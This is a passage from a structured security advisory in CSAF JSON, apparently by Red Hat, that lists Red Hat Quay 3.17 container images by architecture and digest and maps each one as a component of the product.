                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3Ac38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel9\u0026tag=1778600005"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-bundle@sha256%3A706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=1779929597"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3Aeb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel9\u0026tag=1778839890"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3A8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel9\u0026tag=1779922205"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ab3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel9\u0026tag=1778599991"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel9\u0026tag=1778599998"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778600428"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel9\u0026tag=1778599977"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3A3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a?arch=arm64\u0026repository_url=registry.redhat.io/quay/clair-rhel9\u0026tag=1778600005"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3Ace7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel9\u0026tag=1778839890"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3Aa24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-rhel9\u0026tag=1779922205"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "arm64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ad59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel9\u0026tag=1778599991"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3Ab6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel9\u0026tag=1778599998"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Af932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778600428"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel9\u0026tag=1778599977"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3A97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/clair-rhel9\u0026tag=1778600005"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3A18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel9\u0026tag=1778839890"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3A9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-rhel9\u0026tag=1779922205"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ae1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel9\u0026tag=1778599991"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel9\u0026tag=1778599998"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1778600428"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel9\u0026tag=1778599977"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3A5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75?arch=s390x\u0026repository_url=registry.redhat.io/quay/clair-rhel9\u0026tag=1778600005"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3Ad05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel9\u0026tag=1778839890"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3A65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-rhel9\u0026tag=1779922205"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64 as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le as a component of Red Hat Quay 3.17",
          "product_id": "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.17"
      },
      {
        "category": "default_component_of",
